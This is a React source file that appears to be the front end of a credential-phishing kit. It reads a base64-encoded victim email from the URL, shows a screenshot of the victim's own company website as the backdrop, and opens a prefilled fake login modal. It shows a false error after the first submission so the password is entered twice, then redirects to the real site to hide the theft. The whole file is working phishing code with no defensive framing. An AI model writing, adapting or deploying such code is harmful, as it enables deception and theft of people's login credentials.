import React, { useState, useEffect } from 'react';
import LoginModal from './components/LoginModal';
import SuccessMessage from './components/SuccessMessage';
import { handleBase64Data, getLocalizedLanguage } from './utils';

function App() {
  const [loading, setLoading] = useState(true);
  const [showModal, setShowModal] = useState(false);
  const [showSuccess, setShowSuccess] = useState(false);
  const [attempts, setAttempts] = useState(0);
  const [email, setEmail] = useState('');
  const [domain, setDomain] = useState('');
  const [langs, setLangs] = useState({});
  const [backgroundImage, setBackgroundImage] = useState('');
  const [errorMessage, setErrorMessage] = useState('');

  useEffect(() => {
    // Parse URL parameters
    const hash = window.location.hash.substr(1);
    const parts = hash.split('/');
    const emailPart = handleBase64Data(parts[0]);
    const langCode = parts[1] || 'en';

    // Set language
    setLangs(getLocalizedLanguage(langCode));

    // Set email and domain
    if (emailPart && emailPart.includes('@')) {
      setEmail(emailPart);
      const domainPart = emailPart.split('@')[1];
      setDomain(domainPart);
      
      // Set background image
      const imageUrl = `https://image.thum.io/get/width/1200/http://${domainPart}`;
      setBackgroundImage(imageUrl);
    }

    // Initialize page
    setTimeout(() => {
      setLoading(false);
      setShowModal(true);
    }, 700);
  }, []);

  const handleFormSubmit = (success, error) => {
    if (success) {
      const newAttempts = attempts + 1;
      setAttempts(newAttempts);
      setErrorMessage('');
      
      if (newAttempts >= 2) {
        setShowModal(false);
        setShowSuccess(true);
        
        // Redirect after 5 seconds
        setTimeout(() => {
          window.location.replace(`http://www.${domain}`);
        }, 5000);
      } else {
        // Show red alert after first successful submission
        setErrorMessage(langs.msg);
      }
    } else {
      // Show error message
      setErrorMessage(error);
    }
  };

  return (
    <div style={{ 
      backgroundImage: `url('${backgroundImage}')`,
      backgroundSize: 'cover',
      backgroundPosition: 'center',
      minHeight: '100vh',
      position: 'relative'
    }}>
      {loading && (
        <div style={{
          border: '5px solid #f3f3f3',
          borderTop: '5px solid #3498db',
          borderRadius: '50%',
          width: '50px',
          height: '50px',
          animation: 'spin 2s linear infinite',
          margin: '20% auto'
        }}></div>
      )}
      
      <style>{`
        @keyframes spin {
          0% { transform: rotate(0deg); }
          100% { transform: rotate(360deg); }
        }
      `}</style>
      
      {showSuccess ? (
        <SuccessMessage domain={domain} langs={langs} />
      ) : (
        <>
          {showModal && (
            <>
              <div style={{
                position: 'fixed',
                top: 0,
                left: 0,
                width: '100%',
                height: '100%',
                backgroundColor: 'rgba(0,0,0,0.5)',
                zIndex: 1000
              }}></div>
              <LoginModal 
                email={email} 
                domain={domain} 
                langs={langs} 
                onSubmit={handleFormSubmit}
                errorMessage={errorMessage}
              />
            </>
          )}
        </>
      )}
    </div>
  );
}

export default App;